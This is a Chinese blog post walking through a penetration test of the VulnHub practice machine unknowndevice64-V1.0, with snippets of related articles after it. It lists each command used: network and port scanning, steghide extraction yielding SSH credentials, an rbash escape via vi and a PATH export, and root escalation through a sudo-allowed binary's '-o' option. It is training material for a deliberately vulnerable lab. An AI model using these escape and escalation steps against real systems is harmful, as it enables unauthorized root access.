unknowndevice64-V1.0靶机渗透测试

最新推荐文章于 2024-08-09 23:16:30 发布
最新推荐文章于 2024-08-09 23:16:30 发布
阅读量148 收藏 1
点赞数 3
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58786230/article/details/141071138
版权

一、靶机下载地址

https://www.vulnhub.com/entry/unknowndevice64-1,293/

二、信息收集

1、主机发现

# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 "00:0C:29:20:5D:6F"

2、端口扫描

# 使用命令
nmap 192.168.145.205 -p- -sV

3、指纹识别

# 使用命令
whatweb 192.168.145.205:31337

4、目录扫描,没什么发现

# 使用命令
dirsearch -u  "http://192.168.145.205:31337"
dirb http://192.168.145.205:31337

三、获取shell

1、访问靶机IP地址192.168.145.205:31337

2、右击查看页面源码,发现有一个图片 key_is_h1dd3n.jpg

3、访问图片,上面写着 隐藏的秘密,可能是图片隐写

4、将图片下载下来,在kali中使用 steghide 工具提取信息,但是需要密码,根据名字可以知道密码为 h1dd3n

# 使用命令
steghide extract -sf key_is_h1dd3n.jpg

5、查看h1dd3n.txt文件的内容,发现是brainfuck加密

# 使用命令
cat h1dd3n.txt

6、使用BerylEnigma工具解密,得到账号密码ud64:1M!#64@UD

7、使用ssh进行远程连接

# 使用命令
ssh ud64@192.168.145.205 -p 1337

8、发现很多命令被限制,是rbash的shell,双击tab键,查看可执行命令

9、发现vi 和 export 命令可用,vi 绕过,还是有部分命令无法执行

# 使用命令
vi
按shift+:
!/bin/bash

10、配置环境变量

# 使用命令
export PATH=/usr/sbin:/usr/bin:/sbin:/bin

四、提权

1、输入sudo -l命令查看当前

2、sysud64 可以执行 root 权限的命令,直接尝试提权,但是失败了

# 使用命令
sudo sysud64

3、输入sysud64 -h 查看帮助,发现可以使用-o参数

# 使用命令
sudo sysud64 -h

-o file        send trace output to FILE instead of stderr

4、尝试提权,提权成功

# 使用命令
sudo sysud64 -o /dev/null /bin/bash

果冻*果冻*
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶机渗透—unknowndevice64
ray_kong的博客
04-04 4430
渗透unknowndevice64下载地址渗透IP扫描端口扫描http端口访问ssh端口访问rbash逃逸提权 下载地址 download unknowndevice64 地址:https://www.vulnhub.com/entry/unknowndevice64-1,293/ 渗透 IP扫描 sudo arp-scan -l //确定靶机IP地址 扫描到的靶机IP地址是 192.168.10.129 端口扫描 sudo nmap -p- 192.168.10.129 //靶机开放端口 sud
Vulnhub靶机实战——Matrix2
冠霖L的博客
11-10 1181
Matrix2靶机下载地址: https://download.vulnhub.com/matrix/matrix2-Unknowndevice64.ova 环境: VMware 15虚拟机软件 Matrix2靶机IP地址: 192.168.220.159 Kali的IP地址: 192.168.220.155 Matrix2靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.1...
unknowndevice64-V1.0靶机
最新发布
zdd1453691081的博客
08-09 104
【代码】unknowndevice64-V1.0靶机
unknowndevice64-V1.0
weixin_52953960的博客
08-09 62
显示需要密码,根据名字可以知道密码为 h1dd3n,得到一个h1dd3n.txt。发现很多命令被限制,是rbash的shell,双击tab键,查看可执行命令。sysud64 可以执行 root 权限的命令,直接尝试提权。访问图片,上面写着隐藏的秘密,可能是图片隐写。查看文件内容,是 brainfuck 加密。失败了,sysud64 -h 查看帮助。vi 绕过,还是有部分命令无法执行。f12查看源码,发现有一个图片。访问31337端口,没什么发现。export 配置环境变量绕过。使用工具解密,得到账号密码。
vulnhub系列:unknowndevice64-V1.0
jq_j37的博客
08-08 194
vulnhub系列:unknowndevice64-V1.0靶机,打靶文章
vulnhub之unknowndevice64-V1.0渗透实战
weixin_43862283的博客
04-15 475
vulnhub之unknowndevice64-V1.0渗透实战 0x01 环境及配置 难度:中级 目标:获取root权限并阅读/root/flag.txt 网络:桥接模式 DHCP自动分配IP地址 下载地址:https://mega.nz/#!WyQ1UaKC!azV9qvOXqzxOXFcE9qP15fQTEOWgr27plE0SmZTvGhk 靶机:192.168.34.152 攻击机:ka...
靶机渗透测试unknowndevice64: 1)
@小张小张的博客
09-15 923
靶机渗透测试unknowndevice64: 1): Vulnhub靶机 unknowndevice64: 1 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(中等) 目标:成功渗透进入靶机,获取root权限并且读取/root/flag.txt 。 渗透流程: 1.探测主机ip(netdiscover -i eth0 -r 网关) 2.nmap进行靶机端口服务扫描 nmap -sS -Pn -A -p- -n 靶机ip 发现
VulnHub实战篇三:UD64靶机渗透记录
a1004070060的博客
04-08 363
0x01环境描述 靶机名称:unknowndevice64-1 下载地址:下载地址 攻击机ip:192.168.0.105 靶机ip:192.168.0.106(通过C段扫描获得) 渗透目标:提权至root并读取flag文件 0X02渗透过程 使用nmap扫描目标开放端口同时识别服务,使用命令如下。通过扫描我们发现了目标1337端口的http服务以及运行在31337端口的htt...
Unknowndevice64
weixin_43841336的博客
07-18 343
1.查找主机和端口 Nmap -sP 192.168.34.1/24扫描存活主机,并确认靶机(192.168.34.152) nmap -sV -p0-65535 192.168.34.152查看开发端口 访问下31337端口,是一个网站,查看源代码 有一个jpg图片,访问并下载下来,用steghide --extract -sf key_is_h1dd3n.jpg -p h1dd3n将图片隐藏信...
计算机硬件查看软件UnknownDevice
02-28
UnknownDevice对计算机的所有硬件进行查看,方便好用。
无法识别USB设备,解决Unknown Device_亲测 网上的方法都试遍了,就这个成功了!.zip
01-09
标签“unknowndevice”和“windows”表明问题主要发生在Windows系统中,与未知设备相关。Windows系统在无法找到适配的驱动程序或者驱动程序出现问题时,会将设备识别为未知设备。 根据压缩包内的文件名称,我们可以...
unknown device驱动下载_手机usb2.0万能驱动程序
09-29
unknown device驱动下载_手机usb2.0万能驱动程序
《密码编码学与网络安全原理与实践》第九章 第十章 公钥密码学与密钥管理
m0_57291352的博客
08-09 594
原则上不能说传统密码优于公钥密码,也不能说公钥密码优于传统密码公钥密码学仅限于用在密钥管理和签名这类应用中与密钥分配中心的会话过程既不比传统密码中的那些过程更简单,也不比之更有效动机:简化密钥分配和管理、实现签名等功能不对称性是公钥最为重要的性质,可以用来保证“真实”性,“不可否认”性非对称密钥:两个密钥:公钥和私钥,用来实现互补运算,即加密和解密,或者生成签名与验证签名;公钥证书:认证机构将用户的姓名和公钥绑定在一起,用户用自己的私钥对数字文件签名后,可以通过证书识别签名者,因为签名者是唯一拥有与证书上对
网络安全入门教程(非常详细)从零基础入门到精通!
2301_77160226的博客
08-05 1036
网络安全领域犹如一座深邃的知识宝库,从零基础入门到精通是一段充满挑战但也充满收获的旅程。这不仅需要您对知识的不懈追求,更需要大量的实践与经验积累。希望本教程能够为您的网络安全学习之路点亮明灯,引领您在这个充满机遇与挑战的领域中稳步前行,最终成为一名优秀的网络安全专家,为构建安全的网络世界贡献自己的力量!
【网络安全】本地文件包含及远程文件包含漏洞详解
goldfish8848的博客
08-05 862
开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包含在一个文件中,可以保证整体效果的统一和代码量的减少。
《密码编码学与网络安全原理与实践》第四章第六章第七章 对称加密体制
m0_57291352的博客
08-06 913
对称加密包括分组密码和流密码分组密码:信息被分块(block)进行加密和解密,连续的明文元素使用相同的密钥K来加密,密文C=c1c2…=EK(m1)EK(m2)…C =c_1c_2…=E_K(m_1)E_K(m_2)…C=c1​c2​…=EK​(m1​)EK​(m2​)…。分组密码可以看作是一个字符长度很大代换——如64比特或更多。大部分的分组对称密码都基于Feistel结构。可逆变换是必要条件。设计”安全”的密码算法不难,只要使用足够多的轮数就可以,但降低速度,因此所有问题就是平衡问题。流密码:流密码中按
国家网络安全战略如何保护个人信息安全
waitaikong_的博客
08-09 211
网络安全法》规定了个人信息的收集、使用、存储、传输等活动必须遵守法律法规,经过个人同意,并明确告知收集、使用的目的、方式和范围,同时应当保证个人信息的安全性,避免泄露、丢失或被篡改等情况发生。综上所述,国家网络安全战略的实施对个人信息安全产生了积极的影响,通过法律法规的完善、网络安全教育和培训的重视、关键基础设施的安全保护、国际交流与合作、数据分类分级保护以及数据安全风险管理等措施,有效地提高了个人信息的安全保护水平。通过对数据进行分类分级,可以采取不同的保护措施,确保不同级别的数据得到适当的保护。
重庆市合川区第二届网络安全“钓鱼城“杯部分题解
m0_60894143的博客
08-09 350
下载文件后,进行分析往下划看见smb最开始以为是通过smb协议下载的文件找半天没发现,往前翻了翻,看见了flag存储为原始数据通过上述分析发现开头是pk,保存为zip压缩包发现需要密码感觉是伪加密使用工具一把梭再次打开压缩包就发现了flag证实了伪加密下载文件发现是内存文件直接工具分析volatility常规分析一波查看镜像信息分析进程发现没有异常查看cmd历史看到创建用户这个关键点先留意然后查看关键字发现有个zip直接导出到本地改为zip。
怎么修复unknowndevice
09-11
### 回答1: Unknown Device是指电脑在设备管理器中无法识别的未知设备。修复方法有以下几种: 1. 更新驱动程序:右键点击未知设备,选择“更新驱动程序”,尝试使用Windows更新或手动下载并安装适用于该设备的驱动程序。 2. 卸载并重新安装设备:右键点击未知设备,选择“卸载设备”,然后重启电脑。重新插入设备后,电脑将重新识别设备并尝试重新安装驱动程序。 3. 使用设备厂商提供的驱动程序:从设备的官方网站下载并安装针对该设备的最新驱动程序。 4. 检查硬件连接:检查设备和电脑之间的连接是否正常,尝试更换电源线、USB线或其他连接线。 5. 检查设备是否损坏:尝试将设备连接到另一台电脑或设备上,如果该设备仍然无法被识别,可能是设备自身出现故障。 总之,无论哪种方法,都需要仔细分析并一步一步进行试验,以确定最终解决方案。求助专业技术人员可能会更快地解决问题。 ### 回答2: 修复"unknowndevice"的方法取决于具体情况。根据问题的描述,可能是指电脑或移动设备无法识别或识别不出某个设备的错误。 首先,我们可以尝试以下方法来修复这个问题: 1. 重新连接设备:断开设备连接并重新连接,确保连接线是否牢固连接,并将其插入正确的端口或插槽。 2. 重启设备:有时,设备或计算机的重启可以解决无法识别设备的问题。尝试重启设备并查看是否可以解决问题。 3. 更新驱动程序:在设备管理器中查找问题设备,右键点击它并选择"更新驱动程序"。如果有可用的更新,请下载并安装它们,然后重新连接设备。 4. 更新操作系统:确保你的操作系统是最新的版本。更新操作系统可能会修复某些设备不被识别的问题。 5. 使用其他USB端口或电缆:有时,设备无法被识别可能是由于破损的USB端口或电缆引起的。尝试使用不同的USB端口或更换电缆来确认问题所在。 如果以上方法都无效,可能需要采取以下额外措施: 1. 参考设备或计算机的说明手册:查看设备或计算机的手册,以了解更多关于如何识别和连接特定设备的信息。 2. 参考设备制造商的网站:访问设备制造商的官方网站,查找关于修复特定设备的文档、驱动程序或其他支持信息。 3. 寻求专业帮助:如果问题仍然存在,可能需要寻求专业技术支持的帮助。联系设备制造商、计算机技术支持专家或维修中心以获取更多指导。 总之,修复"unknowndevice"的关键是找出具体的原因,并采取相应的措施进行修复。根据具体设备和情况,可能需要尝试多种方法来解决问题。 ### 回答3: 修复 "unknowndevice" 的具体步骤会根据问题的性质和出现该问题的具体设备而有所不同。这是由于 "unknowndevice" 是一个比较宽泛的错误描述,可指示许多不同类型的问题。以下是一些可能的修复步骤: 1. 驱动程序更新:首先,尝试更新相关设备的驱动程序。可以通过设备管理器或设备官方网站下载和安装最新的驱动程序版本。如果驱动程序过时或损坏,可能会导致设备被识别为 "unknowndevice"。 2. 连接检查:检查设备与计算机之间的所有连接,并确保它们正确插入。有些 "unknowndevice" 错误可能是由于不良或不稳定的连接导致的。 3. 重新启动设备和计算机:有时,重新启动设备和计算机可以解决 "unknowndevice" 错误。关闭设备并从电源中断供电,然后重新启动计算机。然后再次连接设备并检查错误是否已解决。 4. 执行设备故障排除:某些操作系统中都有设备故障排除工具,可以帮助识别和修复设备问题。尝试按照操作系统故障排除流程的指导进行检查。 5. 重新安装设备:如果上述方法都无效,可以考虑卸载设备,并重新安装。这可以通过设备管理器中的 "卸载设备" 选项来完成。然后再次连接设备,系统将自动重新安装该设备。 总之,修复 "unknowndevice" 错误需要根据具体情况采取相应的措施。如果问题仍然存在,可能需要咨询专业技术人员或设备制造商以获取更多帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值